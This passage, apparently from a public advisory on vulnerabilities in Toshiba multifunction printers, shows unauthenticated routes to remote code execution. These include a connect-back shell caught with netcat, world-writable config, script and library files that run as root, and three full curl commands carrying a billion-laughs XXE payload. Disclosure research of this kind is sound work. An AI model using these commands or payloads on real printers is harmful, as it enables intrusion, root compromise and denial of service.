&#8216;Session&#8217; in request.cookies:<br \/>30 session = request.cookies[&#8216;Session&#8217;]<br \/>31 if &#8216;csrfpId&#8217; in request.headers:<br \/>32 csrfpId = request.headers[&#8216;csrfpId&#8217;]<br \/>33 if &#8216;BrowserLang&#8217; in request.cookies:<br \/>34 browserLang = request.cookies[&#8216;BrowserLang&#8217;]<br \/>35<br \/>36 log.info(&#8216;Session ID obtained from request :&#8217; + SessionID)<br \/>37 log.info(&#8216;csrfpId obtained from request:&#8217; + csrfpId)<br \/>38 validationMap = True<br \/>39<br \/>40 if validationMap[&#8216;VALIDATION_STATUS&#8217;] == &#8216;PASSED&#8217;:<br \/>41 log.info(&#8216;User Validation : SUCCESS&#8217;)<br \/>42 data = applicationManagementModel.getAppList(browserLang)<br \/>43 log.warning(&#8220;get app list Views : End &#8220;)<br \/>44 
log.warning(&#8220;++++++++++++++++++++++++++++++++&#8221;)<br \/>45 return json.dumps(data)<br \/>46 else:<br \/>47 log.info(&#8216;User Validation : FAILURE&#8217;)<br \/>48 log.warning(&#8220;get app list Views : End &#8220;)<br \/>49 if &#8220;HTTP_REQUEST_FORBIDDEN&#8221; in validationMap:<br \/>50 return HTTPForbidden(&#8220;Error 403 : Forbidden Request&#8221;)<br \/>51 else:<br \/>52 return json.dumps(validationMap)<br \/>53<br \/>54 @view_config(route_name=&#8217;start_background_application&#8217;, xhr=True,<br \/>renderer=&#8217;jsonp&#8217;)<br \/>55 def start_background_application(request):<br \/>56 log.warning(&#8220;++++++++++++++++++++++++++++++++&#8221;)<br \/>57 log.warning(&#8220;start background app : Start &#8220;)<br \/>[&#8230;][\/code]\n<p>Because of the reverse proxy rules and the checks performed before this<br \/>API can be reached, this Python code is reachable using the API path<br \/>`http:\/\/printerip\/tapy\/server\/appmgmt\/applistDeployed` with a cookie<br \/>previously provided by the printer when visiting http:\/\/printerip\/<br \/>(without authentication).<\/p>\n<p>When sending an HTTP request to<br \/>`http:\/\/printerip\/tapy\/server\/appmgmt\/applistDeployed`, the attacker<br \/>will receive a connect-back shell from the printer:<\/p>\n<p>kali# nc -l -v -p 21<br \/>listening on [any] 21 &#8230;<br \/>10.0.0.1: inverse host lookup failed: Unknown host<br \/>connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 37243<br \/>[apache@MFP14144292 \/]$ id<br \/>uid=1000(apache) gid=2000(trusted) groups=2000(trusted)<br \/>[apache@MFP14144292 \/]$ uname -ap<br \/>Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue<br \/>Jul 5 09:58:22 IST 2022 i686 GNU\/Linux<br \/>[apache@MFP14144292 \/]$<\/p>\n<p>Connect-back shell as apache:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>### Remote Code Execution &#8211; Upload of a new .ini configuration file<br \/>inside 
WSGI Python programs<\/p>\n<p>It is possible to overwrite the .ini configuration file used by WSGI<br \/>Python programs. This technique is public as of 2023-02-28:<br \/>https:\/\/blog.doyensec.com\/2023\/02\/28\/new-vector-for-dirty-arbitrary-file-write-2-rce.html.<\/p>\n<p>Apache is running with WSGI configurations:<\/p>\n<p>bash-4.1# ps auxww | grep apache<br \/>apache 1611 0.0 0.1 1264444 3708 ? Sl 10:37 0:00<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker -f<br \/>\/encryption\/al\/network\/config\/httpd-prox.conf -k start<br \/>apache 1822 0.2 3.6 483056 108852 ? Sl 10:37 1:02<br \/>(wsgi:webpanel) -f<br \/>\/encryption\/al\/network\/config\/httpd-wsgi.conf -k start<br \/>apache 1823 0.0 2.1 270952 64172 ? Sl 10:37 0:05<br \/>(wsgi:topaccesspy) -f<br \/>\/encryption\/al\/network\/config\/httpd-wsgi.conf -k start<br \/>apache 1824 0.0 0.1 285148 4452 ? Sl 10:37 0:00<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker -f<br \/>\/encryption\/al\/network\/config\/httpd-wsgi.conf -k start<\/p>\n<p>The Python scripts running as WSGI are configured with specific .ini<br \/>configuration files:<\/p>\n<p>&#8211; &#8211; `\/registration\/al\/WebPanel\/development.ini`<br \/>&#8211; &#8211; `\/registration\/al\/TopAccessPy\/development.ini`<\/p>\n<p>Unfortunately, these configuration files can be rewritten because of<br \/>insecure permissions, allowing a remote attacker to execute commands,<br \/>as described in recent public research.<\/p>\n<p>These files have insecure permissions as shown below:<\/p>\n<p>bash-4.1# ls -la \/registration\/al\/WebPanel\/<br \/>total 2632<br \/>drwxrwxrwx 7 root root 4096 Dec 6 03:33 .<br \/>drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..<br \/>-rwxrwxrwx 1 root root 2642944 Dec 6 03:33 HomeBackgroundImages.tar.gz<br \/>-rwxrwxrwx 1 root root 857 Dec 6 03:33 Makefile<br \/>-rwxrwxrwx 1 root root 909 Dec 6 03:33 config.rb<br \/>-rwxrwxrwx 1 root root 1103 Dec 6 03:33 development.ini<br \/>drwxrwxrwx 4 root root 4096 Jan 22 
2015 predefinedxml<br \/>-rwxrwxrwx 1 root root 199 Dec 6 03:33 pyramid.wsgi<br \/>drwxrwxrwx 3 root root 4096 Dec 6 03:33 statuspages<br \/>drwxrwxrwx 14 root root 4096 Dec 6 03:33 wpclient<br \/>drwxrwxrwx 6 root root 4096 Mar 14 16:32 wpserver<br \/>drwxrwxrwx 2 root root 4096 Dec 6 03:33 wpserver.egg-info<br \/>bash-4.1# ls -la \/registration\/al\/WebPanel\/development.ini<br \/>-rwxrwxrwx 1 root root 1103 Dec 6 03:33<br \/>\/registration\/al\/WebPanel\/development.ini<\/p>\n<p>bash-4.1# ls -la \/registration\/al\/TopAccessPy<br \/>total 36<br \/>drwxrwxrwx 5 root root 4096 Dec 6 03:39 .<br \/>drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..<br \/>-rwxrwxrwx 1 root root 315 Dec 6 03:39 Makefile<br \/>-rwxrwxrwx 1 root root 2091 Dec 6 03:39 TA_CacheScript.sh<br \/>drwxrwxrwx 7 root root 4096 Mar 23 10:37 client<br \/>-rwxrwxrwx 1 root root 1078 Dec 6 03:39 development.ini<br \/>-rwxrwxrwx 1 root root 202 Dec 6 03:39 pyramid.wsgi<br \/>drwxrwxrwx 6 root root 4096 Mar 14 16:32 server<br \/>drwxrwxrwx 2 root root 4096 Dec 6 03:39 server.egg-info<br \/>bash-4.1# ls -la \/registration\/al\/TopAccessPy\/development.ini<br \/>-rwxrwxrwx 1 root root 1078 Dec 6 03:39<br \/>\/registration\/al\/TopAccessPy\/development.ini<\/p>\n<p>These configuration files can be overwritten to include specific commands to be executed:<\/p>\n<p>Content of `\/registration\/al\/TopAccessPy\/development.ini`:<\/p>\n<p>bash-4.1# cat \/registration\/al\/TopAccessPy\/development.ini<br \/>[app:main]<br \/>use = egg:server<\/p>\n<p>pyramid.reload_templates = true<br \/>pyramid.debug_authorization = false<br \/>pyramid.debug_notfound = false<br \/>pyramid.debug_routematch = false<br \/>pyramid.default_locale_name = en<br \/>pyramid.includes = pyramid_tm<\/p>\n<p>[server:main]<\/p>\n<p># Begin logging configuration<\/p>\n<p>[loggers]<br \/>keys = root, server<\/p>\n<p>[handlers]<br \/>keys = console, serverhandler<\/p>\n<p>[formatters]<br \/>keys = generic, serverformatter<\/p>\n<p>[logger_root]<br \/>level = DEBUG<br \/>handlers = 
console<\/p>\n<p>[logger_server]<br \/>level=DEBUG<br \/>handlers=serverhandler<br \/>qualname=server<br \/>propagate=0<\/p>\n<p>[handler_console]<br \/>class = StreamHandler<br \/>args = (sys.stderr,)<br \/>level = NOTSET<br \/>formatter = generic<\/p>\n<p>[handler_serverhandler]<br \/>class=logging.handlers.RotatingFileHandler<br \/>level=DEBUG<br \/>formatter=serverformatter<br \/>args=(&#8216;\/work\/log\/al\/webpanel\/python_ta.log&#8217;,&#8217;a&#8217;,(5*1024*1024),3)<\/p>\n<p>[formatter_generic]<br \/>format = %(asctime)s %(levelname)-5.5s [%(name)s][%(threadName)s]%(message)s<\/p>\n<p>[formatter_serverformatter]<br \/>format=%(asctime)s%(msecs)03d Pid= %(process)d Tid= %(thread)d<br \/>%(filename)s %(lineno)d %(levelname)s %(message)s<br \/>datefmt=%m\/%d %H:%M:%S<\/p>\n<p># End logging configuration<\/p>\n<p>### Remote Code Execution &#8211; Upload of a malicious script<br \/>`\/tmp\/backtraceScript.sh` and injection of malicious gdb commands<\/p>\n<p>When a program crashes, the `\/tmp\/backtraceScript.sh` script will be<br \/>executed as root as shown below:<\/p>\n<p>2023\/05\/27 19:48:02 CMD: UID=0 PID=22535 | sh -c<br \/>\/tmp\/backtraceScript.sh<br \/>&#8220;\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080&#8221; &gt;<br \/>&#8220;\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080&#8243;_backtrace<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22536 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22540 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22539 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22538 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br 
\/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22537 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:03 CMD: UID=0 PID=22541 | gdb -c<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080 -x<br \/>\/tmp\/gdb_commands.txt<br \/>2023\/05\/27 19:48:03 CMD: UID=0 PID=22542 | gdb<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>&#8211;batch &#8211;command=\/tmp\/gdb_commands.txt<br \/>2023\/05\/27 19:48:03 CMD: UID=0 PID=22543 | iconv -l<\/p>\n<p>This script has insecure permissions (777) and will run gdb as root:<\/p>\n<p>Content of `\/tmp\/backtraceScript.sh`:<\/p>\n<p>bash-4.1# ls -la \/tmp\/backtraceScript.sh<br \/>-rwxrwxrwx 1 root root 1457 Apr 6 2016 \/tmp\/backtraceScript.sh<br \/>bash-4.1# cat \/tmp\/backtraceScript.sh<br \/>#!\/bin\/bash<br \/>OIFS=${IFS}<br \/>IFS=$&#8217;\\n&#8217;<br \/>echo &#8220;quit&#8221; &gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;quit&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>EXE_NAME=`gdb -c &#8220;$1&#8221; -x \/tmp\/gdb_commands.txt | grep &#8220;Core was<br \/>generated by&#8221; | cut -d&#8217;\\`&#8217; -f2 | cut -d&#8217; &#8216; -f1`<br \/>echo &#8220;thread apply all backtrace full&#8221; &gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;set print asm&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;set print demangle on&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;disassemble&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;info reg&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;quit&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;quit&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>if [ &#8220;$EXE_NAME&#8221; = &#8220;&#8221; ];then<br \/>if [ -d \/work\/log\/platform\/syscallerr\/core_files 
];then<br \/>mv &#8220;$1&#8221; \/work\/log\/platform\/syscallerr\/core_files\/<br \/>else<br \/>mkdir -p \/work\/log\/platform\/syscallerr\/core_files<br \/>mv &#8220;$1&#8221; \/work\/log\/platform\/syscallerr\/core_files\/<br \/>fi<br \/>else<br \/>if [ -f $EXE_NAME ];then<br \/>gdb $EXE_NAME &#8220;$1&#8221; &#8211;batch &#8211;command=\/tmp\/gdb_commands.txt 2&gt;&amp;1<br \/>elif [ -f $EB2\/bin\/$EXE_NAME ]; then<br \/>gdb $EB2\/bin\/$EXE_NAME &#8220;$1&#8221; &#8211;batch &#8211;command=\/tmp\/gdb_commands.txt 2&gt;&amp;1<br \/>elif [ &#8220;$EXE_NAME&#8221;=&#8221;(wsgi:webapi)&#8221; -o<br \/>&#8220;$EXE_NAME&#8221;=&#8221;(wsgi:webpanel)&#8221; -o &#8220;$EXE_NAME&#8221;=&#8221;(wsgi:topaccesspy)&#8221; ];<br \/>then<br \/>EXE_NAME=\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<br \/>gdb $EXE_NAME &#8220;$1&#8221; &#8211;batch &#8211;command=\/tmp\/gdb_commands.txt 2&gt;&amp;1<br \/>else<br \/>if [ -d \/work\/log\/platform\/syscallerr\/core_files ];then<br \/>mv &#8220;$1&#8221; \/work\/log\/platform\/syscallerr\/core_files\/<br \/>else<br \/>mkdir -p \/work\/log\/platform\/syscallerr\/core_files<br \/>mv &#8220;$1&#8221; \/work\/log\/platform\/syscallerr\/core_files\/<br \/>fi<br \/>fi<br \/>fi<br \/>IFS=${OIFS}<br \/>bash-4.1#<\/p>\n<p>The `\/tmp\/gdb_commands.txt` gdb script (used by gdb in the<br \/>`\/tmp\/backtraceScript.sh` script) can also be overwritten by an<br \/>attacker to contain gdb commands and get Remote Code Execution.<\/p>\n<p>An attacker can change the `\/tmp\/backtraceScript.sh` script to get<br \/>Remote Code Execution.<\/p>\n<p>An attacker can change the `\/tmp\/gdb_commands.txt` script to get<br \/>Remote Code Execution.<\/p>\n<p>### Remote Code Execution &#8211; Upload of a malicious<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py` program<\/p>\n<p>The program `\/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py` runs as<br \/>root when the printer starts:<\/p>\n<p>bash-4.1# ps auxww|grep python<br \/>root 3984 5.0 5.3 
200160 70944 ? Sl 18:49 0:03<br \/>python \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>10000000-0000-0000-0000-500000000000<br \/>root 4597 4.5 3.5 144312 47740 ? Sl 18:49 0:02<br \/>python \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>10000000-0000-0000-0000-500000000001<br \/>root 5193 0.0 0.1 12616 1852 ? S 18:50 0:00 grep python<br \/>bash-4.1#<\/p>\n<p>`\/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py` is a symbolic link to<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py` and this Python<br \/>program has insecure permissions, allowing any local user or any<br \/>remote attacker leveraging the insecure file upload vulnerability to<br \/>overwrite it:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>lrwxrwxrwx 1 root root 32 Mar 15 11:44<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py -&gt;<br \/>..\/..\/thirdparty\/bin\/sapphost.py<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/sapphost.py<br \/>lrwxrwxrwx 1 root root 28 Mar 15 11:44<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/sapphost.py -&gt;<br \/>..\/..\/common\/bin\/sapphost.py<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py<br \/>-rwxrwxrwx 1 root root 2124 Oct 12 2021<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py<\/p>\n<p>An attacker can overwrite this Python code to get Remote Code<br \/>Execution when the printer starts.<\/p>\n<p>### Remote Code Execution &#8211; Upload of malicious libraries<\/p>\n<p>When analyzing the processes running in the printers, it appears the<br \/>`LD_PRELOAD` variable is used to load specific shared libraries:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/al\/libGetNameInfoInterface.so`<br \/>&#8211; &#8211; `\/ramdisk\/al\/libGetAddtInfoInterface.so`<\/p>\n<p>We can find the `LD_PRELOAD` variable set by default in programs<br \/>running in the printers:<\/p>\n<p>bash-4.1# printenv | grep LD_PRELO<br 
\/>LD_PRELOAD=\/ramdisk\/al\/libGetNameInfoInterface.so:\/ramdisk\/al\/libGetAddtInfoInterface.so:<br \/>bash-4.1# ls -la \/ramdisk\/al\/libGetNameInfoInterface.so<br \/>-rwxrwxrwx 1 root root 70813 Dec 6 02:02<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>bash-4.1# s -la \/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>-rwxrwxrwx 1 root root 87311 Dec 6 02:02<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>bash-4.1#<\/p>\n<p>For example, when sending 55 HTTP requests to the printers, new Apache<br \/>processes running as root will be created on the fly by the printer,<br \/>as shown below. These new processes will load and execute code from<br \/>`libGetNameInfoInterface.so` and `libGetAddtInfoInterface.so`. An<br \/>attacker can rewrite any file over them to get Remote Code Execution.<\/p>\n<p>Using the HTTP request from the Pre-authenticated Blind XML External<br \/>Entity (XXE) injection &#8211; DoS, we will send 55 HTTP requests (only the<br \/>last 3 are displayed) containing the Billion-Laugh Attack, to create<br \/>new Apache processes in the remote printer:<\/p>\n<p>kali% curl -i -s -k -X $&#8217;POST&#8217; \\<br \/>-H $&#8217;Host: 10.0.0.1:8080&#8242; -H $&#8217;User-Agent: Mozilla\/5.0 (X11;<br \/>Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0&#8242; -H $&#8217;Accept:<br \/>*\/*&#8217; -H $&#8217;Accept-Language: en-US,en;q=0.5&#8242; -H $&#8217;Accept-Encoding: gzip,<br \/>deflate&#8217; -H $&#8217;Cache-Control: no-cache&#8217; -H $&#8217;Pragma: no-cache&#8217; -H<br \/>$&#8217;Content-Type: text\/plain; charset=utf-8&#8242; -H $&#8217;csrfpId:<br \/>10.0.0.1.852d519a6fa9825fae857bac5c003da0&#8242; -H $&#8217;Content-Length: 760&#8242;<br \/>-H $&#8217;Origin: http:\/\/10.0.0.1:8080&#8242; -H $&#8217;Connection: close&#8217; -H<br \/>$&#8217;Referer: http:\/\/10.0.0.1:8080\/?MAIN=TOPACCESS&#8217; \\<br \/>-b $&#8217;Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;<br \/>Locale=en-US,en#q=0.5; BrowserLang=en_US;<br 
\/>pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT&#8217; \\<br \/>&#8211;data-binary $'&lt;!DOCTYPE lolz [\\x0d\\x0a &lt;!ENTITY lol<br \/>\\&#8221;lol\\&#8221;&gt;\\x0d\\x0a &lt;!ELEMENT lolz (#PCDATA)&gt;\\x0d\\x0a &lt;!ENTITY lol1<br \/>\\&#8221;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol2 \\&#8221;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol3 \\&#8221;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol4 \\&#8221;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol5 \\&#8221;&amp;lol4;&amp;lol4;&amp;lol4;\\&#8221;&gt;\\x0d\\x0a &lt;!ENTITY lol6<br \/>\\&#8221;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol7 \\&#8221;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol8 \\&#8221;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol9 \\&#8221;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;\\&#8221;&gt;\\x0d\\x0a]&gt;\\x0d\\x0a&lt;lolz&gt;&amp;lol9;&lt;\/lolz&gt;&#8217;<br \/>\\<br \/>$&#8217;http:\/\/10.0.0.1:8080\/contentwebserver&#8217; &amp;<br \/>[53] 2286190<\/p>\n<p>kali% curl -i -s -k -X $&#8217;POST&#8217; \\<br \/>-H $&#8217;Host: 10.0.0.1:8080&#8242; -H $&#8217;User-Agent: Mozilla\/5.0 (X11;<br \/>Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0&#8242; -H $&#8217;Accept:<br \/>*\/*&#8217; -H $&#8217;Accept-Language: en-US,en;q=0.5&#8242; -H 
$&#8217;Accept-Encoding: gzip,<br \/>deflate&#8217; -H $&#8217;Cache-Control: no-cache&#8217; -H $&#8217;Pragma: no-cache&#8217; -H<br \/>$&#8217;Content-Type: text\/plain; charset=utf-8&#8242; -H $&#8217;csrfpId:<br \/>10.0.0.1.852d519a6fa9825fae857bac5c003da0&#8242; -H $&#8217;Content-Length: 760&#8242;<br \/>-H $&#8217;Origin: http:\/\/10.0.0.1:8080&#8242; -H $&#8217;Connection: close&#8217; -H<br \/>$&#8217;Referer: http:\/\/10.0.0.1:8080\/?MAIN=TOPACCESS&#8217; \\<br \/>-b $&#8217;Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;<br \/>Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT&#8217; \\<br \/>&#8211;data-binary $'&lt;!DOCTYPE lolz [\\x0d\\x0a &lt;!ENTITY lol<br \/>\\&#8221;lol\\&#8221;&gt;\\x0d\\x0a &lt;!ELEMENT lolz (#PCDATA)&gt;\\x0d\\x0a &lt;!ENTITY lol1<br \/>\\&#8221;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol2 \\&#8221;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol3 \\&#8221;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol4 \\&#8221;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol5 \\&#8221;&amp;lol4;&amp;lol4;&amp;lol4;\\&#8221;&gt;\\x0d\\x0a &lt;!ENTITY lol6<br \/>\\&#8221;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol7 \\&#8221;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol8 \\&#8221;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;\\&#8221;&gt;\\x0d\\x0a<br 
\/>&lt;!ENTITY lol9 \\&#8221;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;\\&#8221;&gt;\\x0d\\x0a]&gt;\\x0d\\x0a&lt;lolz&gt;&amp;lol9;&lt;\/lolz&gt;&#8217;<br \/>\\<br \/>$&#8217;http:\/\/10.0.0.1:8080\/contentwebserver&#8217; &amp;<br \/>[54] 2286192<\/p>\n<p>kali% curl -i -s -k -X $&#8217;POST&#8217; \\<br \/>-H $&#8217;Host: 10.0.0.1:8080&#8242; -H $&#8217;User-Agent: Mozilla\/5.0 (X11;<br \/>Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0&#8242; -H $&#8217;Accept:<br \/>*\/*&#8217; -H $&#8217;Accept-Language: en-US,en;q=0.5&#8242; -H $&#8217;Accept-Encoding: gzip,<br \/>deflate&#8217; -H $&#8217;Cache-Control: no-cache&#8217; -H $&#8217;Pragma: no-cache&#8217; -H<br \/>$&#8217;Content-Type: text\/plain; charset=utf-8&#8242; -H $&#8217;csrfpId:<br \/>10.0.0.1.852d519a6fa9825fae857bac5c003da0&#8242; -H $&#8217;Content-Length: 760&#8242;<br \/>-H $&#8217;Origin: http:\/\/10.0.0.1:8080&#8242; -H $&#8217;Connection: close&#8217; -H<br \/>$&#8217;Referer: http:\/\/10.0.0.1:8080\/?MAIN=TOPACCESS&#8217; \\<br \/>-b $&#8217;Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;<br \/>Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT&#8217; \\<br \/>&#8211;data-binary $'&lt;!DOCTYPE lolz [\\x0d\\x0a &lt;!ENTITY lol<br \/>\\&#8221;lol\\&#8221;&gt;\\x0d\\x0a &lt;!ELEMENT lolz (#PCDATA)&gt;\\x0d\\x0a &lt;!ENTITY lol1<br \/>\\&#8221;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol2 \\&#8221;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol3 \\&#8221;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol4 
\\&#8221;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol5 \\&#8221;&amp;lol4;&amp;lol4;&amp;lol4;\\&#8221;&gt;\\x0d\\x0a &lt;!ENTITY lol6<br \/>\\&#8221;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol7 \\&#8221;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol8 \\&#8221;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol9 \\&#8221;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;\\&#8221;&gt;\\x0d\\x0a]&gt;\\x0d\\x0a&lt;lolz&gt;&amp;lol9;&lt;\/lolz&gt;&#8217;<br \/>\\<br \/>$&#8217;http:\/\/10.0.0.1:8080\/contentwebserver&#8217; &amp;<br \/>[55] 2286194<\/p>\n<p>We can find that new Apache processes are created using `LD_PRELOAD`<br \/>variables on the remote printer:<\/p>\n<p>2023\/05\/27 11:31:42 CMD: UID=0 PID=4132 |<br 